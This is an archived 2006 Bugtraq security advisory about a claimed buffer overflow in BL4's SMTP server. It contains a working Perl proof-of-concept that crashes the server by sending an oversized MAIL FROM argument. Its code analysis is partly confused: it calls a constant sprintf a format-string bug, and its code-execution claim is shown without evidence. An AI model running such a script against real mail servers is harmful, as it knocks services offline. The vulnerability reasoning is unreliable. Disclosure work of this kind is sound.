lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060427082425.22763.qmail@securityfocus.com>
Date: 27 Apr 2006 08:24:25 -0000
From: the_day@...o.or.id
To: bugtraq@...urityfocus.com
Subject: BL4's SMTP server BufferOverflow Vulnerable


---------------------------------------------------------------------------
[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable
---------------------------------------------------------------------------

Author       : Dedi Dwianto
Date         : April, 27th 2006
Location     : Indonesia, Jakarta
Web          : http://advisories.echo.or.id/adv/adv30-theday-2006.txt
Critical Lvl : High
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : BL4's SMTP server
version     : < 0.1.5
URL         : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0
Description :

BL4's SMTP server is an inbound only SMTP server.
It currently uses hardcoded values for handling email. 
The SMTP server puts the incoming email into various text files.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
BL4's SMTP server is to a flaw that can allow remote attacker to
cause a denial of service or a attacker can Execution of Arbitrary Code.
The vulnerability is due to a buffer overflow in the SMTP service. 
A remote attacker can repeatedly send more that 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server.

------------------think.c-----------------------------------
                ...........
                {
                        slaveEmail[x]->isData = 0;
                        slaveEmail[x]->emailFrom = 0;
                        slaveEmail[x]->emailTo = 0;
                        free(buffer);
                        buffer = malloc(sizeof(char) * 12);
                        sprintf(buffer, "250 OK\r\n");
                        return buffer;
                }
                free(buffer);
                .............
		slaveEmail[x]->EHLO = buffer;
                slaveEmail[x]->EHLOtrue = 1;

                buffer = malloc(sizeof(char) * 12);
                sprintf(buffer, "250 OK\r\n"); 
                return buffer;
-----------------------------------------------------------
	--
	sprintf(buffer, "250 OK\r\n");
	--
	Vulnerable for format strings.
	
	--
	free(buffer);
        buffer = malloc(sizeof(char) * 12);
	--
	Vulnerable for buffer overflow.
A attacker can create Arbitrary Code here .


Poc:
~~~~~~~~~~~~

#!/usr/bin/perl

use IO::Socket;
use Socket;

my($socket) = "";


if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };
$adr = $ARGV[0];
$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";


        print " -- Connecting To SMTP server at $adr port $prt ... \n";

        sleep(1);

        print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";

        sleep(1);

        print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";

        sleep(1);
        printf("[+]Ok!\n");
        printf("[+]Crash service.....\n");
        printf("[~]Done.\n");

        close($socket);


sub usage()
 {
 print "\n=========================================\r\n";
 print "     BL4's SMTP server Remote DOS \r\n";
 print "=========================================\r\n";
 print "       Bug Found by Dedi Dwianto \r\n";
 print "    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
 print "      Echo Security Research Group \r\n";
 print "=========================================\r\n";
 print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";
 exit();
 }


---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous
~ newbie_hacker@...oogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id
     Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ